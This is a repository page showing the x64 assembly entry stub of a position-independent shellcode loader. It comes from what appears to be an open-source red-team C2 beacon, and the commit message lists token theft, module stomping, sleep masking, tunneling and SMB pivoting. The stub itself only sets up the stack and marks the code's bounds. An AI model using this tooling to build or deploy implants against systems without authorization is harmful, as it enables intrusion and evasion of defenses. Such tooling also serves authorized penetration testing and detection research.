Files
MaorSabag-NaX/src_loader/asm/x64/Stardust.asm
T
MaorSabag c0fc8d878b Initial commit: NoNameAx public release
Position-independent C2 beacon for Adaptix Framework with:
- PIC shellcode beacon (PEB walk, FNV1a hashing)
- BeaconGate API proxy + WFSO PoC sleepmask (extensible)
- BOF execution with module stomping
- Malleable C2 profiles with runtime switching
- WinHTTP transport (proxy-aware)
- Token manipulation (steal, impersonate, create)
- TCP tunneling (SOCKS, lportfwd, rportfwd)
- SMB pivoting
- Stardust UDRL loader with module stomping
2026-06-28 09:44:19 -04:00

49 lines
892 B
NASM

;; NaX src_loader - entry stubs
;;
;; Sections:
;; .text$A - Start / StRipStart
;; .text$E - StRipEnd (MUST be last section)
[BITS 64]
DEFAULT REL
EXTERN PreMain
GLOBAL Start
GLOBAL StRipStart
GLOBAL StRipEnd
;; ========= [ .text$A - entry stubs ] =========
[SECTION .text$A]
Start:
push rsi
mov rsi, rsp
and rsp, 0FFFFFFFFFFFFFFF0h
sub rsp, 020h
call PreMain
mov rsp, rsi
pop rsi
ret
StRipStart:
lea rax, [Start]
ret
;; ========= [ .text$E - end marker ] =========
[SECTION .text$E]
StRipEnd:
lea rax, [.loader_end] ; 7 bytes
ret ; 1 byte
nop ; 8 bytes of padding to fill 16-byte section
nop
nop
nop
nop
nop
nop
nop
.loader_end: